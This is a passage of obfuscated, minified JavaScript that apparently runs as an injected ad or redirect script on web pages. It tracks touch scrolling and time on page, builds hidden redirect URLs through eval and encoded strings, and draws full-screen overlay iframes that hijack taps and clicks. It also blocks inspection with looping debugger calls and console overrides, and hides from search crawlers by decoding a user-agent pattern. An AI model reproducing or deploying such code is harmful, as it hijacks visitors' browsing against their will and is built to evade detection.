Set,window[d(284)].has(a[d(278)])||(window[d(284)][d(233)](a[d(278)]),console[d(239)](),o=a[d(278)],r=a.i1,i=a.i2,e=a.i3,s=a.i4,n=a.i5,b=a[d(295)],u=a[d(292)],c=a[d(301)],sessionStorage[o+d(207)])||(f=JSON.parse(sessionStorage[o]||"[]"),l=0,document[d(216)](d(220),function(){var a,t=d;H-G<e&&(a=(Date[t(256)]()-l)/1e3,n<a)&&(F++,l=Date[t(256)]())},!1),v=Date.now(),f[d(229)](!1),sessionStorage[o]=JSON[d(224)](f),setInterval(function(){var a=d,t=(Date.now()-v)/1e3,t=r<=t,e=i<=F,n=document[a(306)][a(202)]>=s,t=t&&e&&n,e=(f[f[a(261)]-1]!==t&&(f[f.length-1]=t,sessionStorage[o]=JSON[a(224)](f)),f[a(276)](Boolean)[a(261)]),n=b<=e,t=!u||f[a(213)](Boolean),e=!c||f[0]&&f[a(213)](Boolean);n&&t&&e&&(sessionStorage[o+a(207)]=a(317))},1e3))}function J(a){return""===a?0:parseInt(a,10)}function K(a,t){var e=b6;return{classId:e(305)+a,i1:J(t.i1),i2:J(t.i2),i3:J(t.i3),i4:J(t.i4),i5:J(t.i5),i11:J(t.i11),i12:t[e(292)],i13:t.i13}}function L(a,t){var e=b6;if(sessionStorage[a[e(278)]+e(207)])for(var n in t)n.startsWith("r")&&typeof t[n]!==e(191)&&(t["k"+n[e(311)](1)]=t[n])}function M(a){p=a.m1,j=a.m2,n=a.m3}function N(a){var e,c=b6;null==sessionStorage[c(203)](c(297)+a)||(e=sessionStorage[c(203)](c(246)+a),I(e=K(a,a=JSON[c(252)](e))),M(a),L(e,a),v=parseInt(a.k2)>=T(1,100),w=parseInt(a.k1)>=T(1,100),x=parseInt(a.k3)>=T(1,100),e=((a,t,e,n)=>{var o=c,r={this_touch_status:!1,touch_min_height:0,touch_max_height:0,touchDelayTimeout:0};function i(a){var t=a0b,a=a.split(","),a=a[a.length-1][t(249)]("_");r.touch_min_height=parseInt(a[0]),r[t(280)]=parseInt(a[1])}if(a){var s=a[o(249)](","),s=s[0]?parseInt(s[0]):100;if(100*Math.random()<s)return r[o(286)]=!0,i(a),r}if(e)for(var b=e[o(249)](",")[0][o(249)]("_"),u=0;u<b[o(261)];u++)if(parseInt(b[u])===n)return r[o(286)]=!0,i(e),r;if(t){a=t[o(249)](","),s=parseInt(a[0]),a=parseInt(a[1]);if(100*Math[o(263)]()<s)r[o(286)]=!0,r.touchDelayTimeout=a,i(t)}return r})(a[c(230)],a[c(227)],a[c(241)],q),A=e.this_touch_status,B=e.touch_min_height,C=e[c(280)],D=e[c(228)],v||((e=t(a.k8,"_"))&&-1!==e.indexOf(q+"")?v=!0:w||((e=t(a.k7,"_"))&&-1!==e[c(279)](q+"")?w=!0:2===(e=t(a.k5,","))[c(261)]?parseInt(e[0])>=T(1,100)&&(v=!0,y=1e3*parseInt(e[1])):2===(e=t(a.k4,","))[c(261)]&&parseInt(e[0])>=T(1,100)&&(w=!0,y=1e3*parseInt(e[1])))),x)||((e=t(a.k9,"_"))&&-1!==e[c(279)](q+"")?x=!0:2===(e=t(a.k6,","))[c(261)]&&parseInt(e[0])>=T(1,100)&&setTimeout(function(){x=!0,al()},1e3*parseInt(e[1])))}document[b6(216)](b6(244),function(a){var t=b6,a=a[t(247)][0][t(310)];H=G=a},!1),document[b6(216)](b6(267),function(a){var t=b6,a=a[t(247)][0][t(310)],a=(H=H<a?a:H)-(G=a<G?a:G);E[t(285)](a)},!1),N(g);var O="",P=2,Q=(d+="?",c+="?",U("/uci."));function R(a){for(var t=b6,e="",n=0;n<a;n++)e+=Math[t(258)](10*Math[t(263)]());return e}function S(a){for(var t=b6,e="",n=t(248),o=0;o<a;o++)e+=n.charAt(Math[t(258)](Math[t(263)]()*n[t(261)]));return e}function T(a,t){var e=b6;return Math.floor(Math[e(263)]()*(t-a+1))+a}function U(a){var t=b6;return a[t(249)]("")[t(238)]().join("")}function V(a,t){for(var e=b6,n=[],o=0;o<a[e(261)];o+=t)n[e(229)](a[e(311)](o,o+t));return n}function W(a,t){for(var e=b6,n="",o=0;o<t[e(261)];o++)n+=t[o],o<t[e(261)]-1&&(n+=a);return n}function X(){var br=b6,aB=Date[br(252)](new Date)/1e3+"",aC=aB[br(193)](6,10),aD=Math[br(258)](9*Math[br(263)]())+1,aE=(aB*=aD,(aB+"")[br(261)]),aF=aD+""+aE+aB,aG={1:"+",2:"*"},aH=Math[br(258)](2*Math[br(263)]())+1,aI=Math.floor(998*Math[br(263)]())+1,aJ=Math[br(258)](998*Math[br(263)]())+1,aK=aI+aG[aH]+aJ,aL=(aI+"")[br(261)],aM=(aJ+"").length,aN=aC,aO=eval(aK)*aN+"2",aP=aH+""+aL+aM+aI+aJ+aO,aQ=aF+aP;return aQ}function Y(){for(var a=b6,t=(g+"").split(""),e=t[a(261)],n=[e],o=[],r=0;r<10;r++){var i=Math[a(258)](9*Math.random())+1;o[r]=i}for(var s=[0,1,2,3,4,5,6,7,8,9],r=1;r<s[a(261)];r++){var b=Math[a(258)](Math.random()*(r+1));[s[r],s[b]]=[s[b],s[r]]}for(r=0;r<e;r++){var u=s[r];o[u]=t[r],n[r+1]=u}return n[a(192)]("")+o[a(192)]("")}function Z(){var a=b6,a=Y()+X()+(new Date)[a(293)]()+"";return O=a}function a0(){for(var t=b6,e=[233280,9301,49297,714025,4096,150889,134456,281,28411,7875,421,1663,14406,967,3041,214326,3613,45289],n=new Date(Date[t(256)]()-b),o="",r=n[t(282)]()+1,i=n[t(312)](),s=""+n.getFullYear(),s=(s+=r<=9?"0"+r:r)+(i<=9?"0"+i:i)+a,u=0;u<6;u++)o+=(0,String[t(199)])(97+(parseInt(s)*e[3*u+1]+e[3*u+2])%e[3*u]%26);return o}function a1(a,t){for(var e=b6,n="",o=0;o<a[e(261)];o++){var r=a[e(243)](o);48<=r&&r<=57&&(r=(r-48+t)%10+48),n+=String[e(199)](r)}return n}function a2(a){var a=a1(a,5),t=a.length;return t<10?t="00"+t:t<100&&(t="0"+t),t+a}var a3=location[b6(309)],a4=navigator,a6,a7,a8,a9,aa,ab,ac,ad,ae,af,ag,ah,ai,aj,ak,am,an,ao,ap,aq,ar,as,at,au,av,aw,ax,ay,az,az,aA,aA;function a5(){var a=b6,t=-1!=a4[a(281)][a(279)](a(304)),e=-1!=a4[a(281)][a(279)](a(197));a4[a(281)];return(t=-1==a3[a(279)]("vv")&&t)||e}function al(){var bA=b6;x&&!window[bA(225)]&&(window.temp=!0,P=3,eval(ab)())}a5()||(a6=document,a7="h"+U(b6(319))+"/",a8="0",a9=S(11),aa=S(10),ab=S(10),ac=S(10),ad=S(7),ae=T(2147483547,2147483647),af=ae-T(1e4,2e4),ag=T(115,122),ah=function(){},ai=b6(302),aj=b6(266),v?(ai=b6(236),aj="100vw",a8="1",P=3,ah=function(a){var t=b6;a.style["z-in"+t(232)]=af}):w&&(ai=p+"vh",aj=b6(218),a8="2",P=4,ah=function(a){var t=b6;a.style["z-in"+t(232)]=af}),ak=Date[b6(256)](),E[b6(285)]=function(aB){var bz=b6;if(A){if(0!=D){var aC=new Date(ak).getTime(),aD=(Date[bz(256)]()-aC)/1e3;if(aD<D)return}B<aB&&aB<=C&&(P=3,eval(ab)())}},am="",an=b6(289),ao=b6(212),ap=b6(259),aq="",ar=b6(290),1==h&&(an=b6(274),am=b6(264),i==b6(259)&&(am="padding-bottom:32%;",ao="bottom",ap=b6(259),ar=b6(300)),ae=T(8e4,9e4)),an=V(an,2),an=W(b6(237),an),an='"'+an+'"',ao=V(ao,1),ao=W(b6(237),ao),ao='"'+ao+'"',ap=V(ap,1),ap=W(b6(237),ap),ap='"'+ap+'"',as="",at="",j==b6(308)&&(as=U(b6(316)),at=U(b6(268))),au=T(100,200),av=au+200,aw=y+av+100,ax=aw+300,ay=ax+300,az=function(){},u&&(a8+="3",az=function(){var bD=b6,aB=function(aD){var bB=a0b,aE=document[bB(303)]("body"),aF=document[bB(303)](aD),aG=aF[bB(202)],aH=aC(aF),aI=aH+aG,aJ=!0;function aK(aL){var bC=bB,aM=aL[bC(247)][0],aN=aM[bC(310)],aO=aM.pageY,aP=0,aP=1!=h?aM.pageY:aM[bC(310)];aH<=aP&&aP<aI&&aJ&&(P=4,eval(ab)(!1))}aE.addEventListener("touchmove",aK)};function aC(a){for(var t=bD,e=a[t(254)],n=a[t(272)];null!==n;)e+=n[t(254)],n=n[t(272)];return e}setTimeout(function(){aB("."+ad)},ax),ai!=bD(302)&&ai!=bD(236)&&setTimeout(function(){aB("."+a9)},ax+50)}),aA=function(){},aA=k==b6(308)?function(a){var t=b6,e=(a.parentNode[t(315)](),document[t(250)](a9));if(e)for(var n=0;n<e.length;n++)e[n][t(210)][t(271)]="0";document[t(287)](t(306))[0][t(210)][""+ar]="0px",event[t(270)]()}:function(aB){var bG=b6;event[bG(270)](),eval(ab)()},function(){var bJ=b6,aB={data3:{0:{wdf:a7+a0()+Q+c+Z()}}},aC=function(a){var t=a0b;return a[t(249)]("").reverse()[t(192)]("")};function aD(){return a7+a0()+Q+d+a2(O)+P+X()}window[aa]=function(a){aA(a)},window[ab]=function(a){var t=a0b,e=document[t(250)](a9);if(e&&null==a)for(var n=0;n<e[t(261)];n++)e[n][t(210)][t(271)]="0";window[t(242)][t(309)]=aD()},al(),x&&!window[bJ(225)]&&(window[bJ(225)]=!0,P=3,eval(ab)());var aE=function(){window[bJ(242)].href=aD()},aF=aC(aB[bJ(235)][0].wdf),aG="",aH=(a8=" ",aG+=as+bJ(208)+ad+bJ(313)+a8+bJ(200)+"</div>",aG+=bJ(219)+a9+bJ(273),document[bJ(251)](bJ(217)+am+"}#"+ac+bJ(245)+ac+'">'),document.writeln(aG),document[bJ(251)](bJ(269)),setTimeout(function(){function aI(aJ,aK,aL){var bL=a0b,aM=document[bL(250)](aJ)[0];aM.style.height=ag+"px",aM.style[eval(ao)]="0",aM.style.left="0",aM.style[bL(223)+bL(206)+"on"]=at,aM.style["z-in"+bL(232)]=ae,aM.style.width=bL(218),aM[bL(222)]+="<i"+bL(205)+"yl"+bL(283)+"th:100%;h"+bL(201)+"ht:"+ag+"p"+bL(194)+bL(209)+U(aK)+bL(211),aM[bL(222)]=aM[bL(222)]+aq,aM["on"+bL(221)+"ck"]=function(){P=2,aL()},aM.style[bL(198)+"it"+bL(195)]=eval(an)}aI(ad,aF,aE)},av),setTimeout(function(){var bM=bJ,aI=document[bM(250)](a9)[0];aI.style[bM(296)+bM(298)+bM(314)]=ai,aI.style[bM(262)]=aj,ah(aI),aI.style[eval(ap)]="0",aI.style.left="0",aI["on"+bM(221)+"ck"]=function(){eval(ab)()}},aw),az(),sessionStorage[bJ(203)](bJ(297)+g));null==aH&&r()}())}()})(),console.log("B2_DJ")};;;;window._PC_ZS=function(){window.localStorage,console.log("PC_ZS")},window._HM_ZS=window._PC_ZS;;function store(key,val,day){if(void 0!==window.localStorage)if(1<arguments.length){day=day||360;var obj={val:val,exp:(new Date).getTime()+43200*day};window.localStorage.setItem(key,JSON.stringify(obj))}else{var data=window.localStorage.getItem(key);if(data){try{data=JSON.parse(data)}catch(e){data=eval("("+data+")")}(void 0===data.exp||data.exp>=(new Date).getTime())&&data.val}}else 1<arguments.length?setCookie(key,val,day):getCookie(key)}"undefined"==typeof console&&(window.console={log:function(){}}),-1<location.href.indexOf("LDA")&&alert("LDA"),!function(f,h,d){(new Date).getHours();function r(e,t,n){n=n||1;var o=new Date;o.setTime(o.getTime()+12*n*60*60*1e3),h.cookie=e+"="+escape(t)+";path=/;expires="+o.toGMTString()}function i(e){var e=new RegExp("(^| )"+e+"=([^;]*)(;|$)");return(e=h.cookie.match(e))?unescape(e[2]):null}n=this,e=function(e){function c(e){return~d.userAgent.toLowerCase().indexOf(e)}function r(e,t){t!==s?location.href=e:location.replace(e)}var a=function(){return(a=Object.assign||function(e){for(var t,n=1,o=arguments.length;n<o;n++)for(var r in t=arguments[n])Object.prototype.hasOwnProperty.call(t,r)&&(e[r]=t[r]);return e}).apply(this,arguments)},u={clear:!0,debug:!0,debugTime:3e3},s=2,o=0,i=0,l=function(e){var t=0,n=1<<o++;return function(){(!i||i&n)&&2==++t&&(i|=n,e(),t=1)}},t=(n.prototype.clear=function(){this._clear&&(console.clear=function(){})},n.prototype.debug=function(){var e;this._debug&&(e=new Function("debugger"),setInterval(e,this._debugTime))},n.prototype.redirect=function(e){var t,n,o=this._redirect;o&&(0!==o.indexOf("http")?(n=location.pathname+location.search,((t=o)?"/"!==t[0]?"/".concat(t):t:"/")!==n&&r(o,e)):location.href!==o&&r(o,e))},n.prototype.callback=function(){if((this._callback||this._redirect||this._write)&&f){var e=this.fire.bind(this),t=f.chrome||c("chrome"),n=c("firefox");if(!t)return n?((t=/./).toString=e,void console.log(t)):(a=e,n=new Image,Object.defineProperty(n,"id",{get:function(){a(s)}}),void console.log(n));(r=/./).toString=l(t=e),o.toString=l(t),(n=new Date).toString=l(t),console.log("%c",o,r,n),i=l(t),n=new Error,Object.defineProperty(n,"message",{get:function(){i()}}),console.log(n)}function o(){return r}var r,i,a},n.prototype.write=function(){var e=this._write;e&&(h.body.innerHTML="string"==typeof e?e:e.innerHTML)},n.prototype.fire=function(e){this._callback?this._callback.call(null):(this.redirect(e),this._redirect||this.write())},n.prototype.ban=function(){this.callback(),this.clear(),this.debug()},n);function n(e){var e=a(a({},u),e),t=e.clear,n=e.debugTime,o=e.callback,r=e.redirect,i=e.write;this._debug=e.debug,this._debugTime=n,this._clear=t,this._callback=o,this._redirect=r,this._write=i}e.init=function(e){new t(e).ban()},Object.defineProperty(e,"__esModule",{value:!0})},"object"==typeof exports&&"undefined"!=typeof module?e(exports):"function"==typeof define&&define.amd?define(["exports"],e):e((n="undefined"!=typeof globalThis?globalThis:n||self).CB={});var t,e=/\bad=(\w+)/,n=(-1<location.search.search(e)&&(t="_"+location.search.match(e)[1],Object.keys(ac).forEach(function(e){-1<e.search(/2/)||(ac[e]=-1<ac[e].indexOf(t)?[t]:[],ac[e.replace(/1/,"2")]=0<ac[e].length?[100]:[])}),console.log(ac)),"_"+String.fromCharCode(66)+"J"+String.fromCharCode(83)),e=(-1==(location.href+(h.cookie||"")).search(new RegExp(n,""))&&CB.init({redirect:"/?FROM=bjs&u="+n.substr(1)}),((e,t)=>{var n="";e=decodeURIComponent(e);for(var o=0;o<e.length;o++)n+=String.fromCharCode(t.charCodeAt(o%t.length)^e.charCodeAt(o));return n})("N869FU@0D\r\f\tN\r\t\n\t\n\t\t\f\\F\t\n\vFP[\n\v\t\fB\n\v\f\t\r\t!\b\t\\","fkyou")),n=new RegExp(e,"ig").test(d.userAgent);var a=("ontouchstart"in f||0<d.maxTouchPoints||0<d.msMaxTouchPoints)&&!n,c=null;C([105,109,112,111,114,116,97,110,116]);function o(e,n,o){return e.forEach(function(t,e){o.push({func:function(){"string"==typeof t&&(f._TJEX=f._TJEX||[],f._TJEX.push(t),t=f[t]);try{t&&t()}catch(e){console.log("funcerr",t)}},weight:n[e]})}),o}var e=ac.ZS1||[],n=ac.DJ1||[],u=ac.DJ2||[],s=ac.PC1||[],l=ac.PC2||[],e=o(e,ac.ZS2||[],[]),n=o(n,u,[]),u=o(s,l,[]);function g(e,t){if(!t)return[];for(var n=e.filter(function(e){return!e.disable}),o=0,r=0;r<n.length;r++)o+=n[r].weight,n[r].max=o;for(var i,a=Math.round(Math.random()*(o-1)),c=[],r=0;r<n.length;r++)if(a<n[r].max){c.push(n[r]),1<=--t&&(n.splice(r,1),i=g(n,t))&&c.push.apply(c,i);break}return c}var p=g(n,2),v=g(e,1),m=g(u,1);function y(e,t){try{e.func()}catch(e){console.log(t,e)}}("undefined"!=typeof CAD&&0<CAD||"undefined"!=typeof COOKIE_PRE&&(i(COOKIE_PRE+"auth")||i("auth")))&&(v=[],p=[]);for(var b,_=1;_<=2;_++){var w="A"+_+"_",O="z"+(1e4*_+Math.round(Math.random()+1e4));f[w]=O,f[O]=function(e){var t,n,o;return a?(null==c&&((o=i(t=COOKIE_PRE+"_ac"))||r(t,o="r"+~~(9999*Math.random()),60),c=~~i(COOKIE_PRE+o),r(COOKIE_PRE+o,++c,1)),t=c,o=new RegExp("(google|baidu)\\.com","ig"),n=-1<h.referrer.search(o),0<p.length&&y(p.shift(),2),!(n&&t<=1||39<=t)&&void(e||0<v.length&&y(v.shift(),3))):(0<m.length&&y(m.shift(),1),!1)}}function C(e){for(var t="",n=0;n<e.length;n++)t+=String.fromCharCode(e[n]);return t}function T(e){return function(){try{e()}catch(e){b[e.message]||(b[e.message]=1,console.log(e))}}}f.sTimeout=setTimeout,f.sInterval=setInterval,b={},f.setTimeout=function(e,t){return f.sTimeout(T(e),t<500?1e3:t)},f.setInterval=function(e,t){return f.sInterval(T(e),t<500?1e3:t)}}(window,document,navigator)};(()=>{var _;(new Date).getHours(),_={ZS1:["_BD_ZS"],ZS2:[50],DJ1:["_BD_DJ","_B2_DJ"],DJ2:[50,50],PC1:["_HM_ZS"],PC2:[100]},kmleuzxb(window,document,navigator,_)})();;//010031-qc2/*b4768bd5991a7000091af4b7012f823420568*/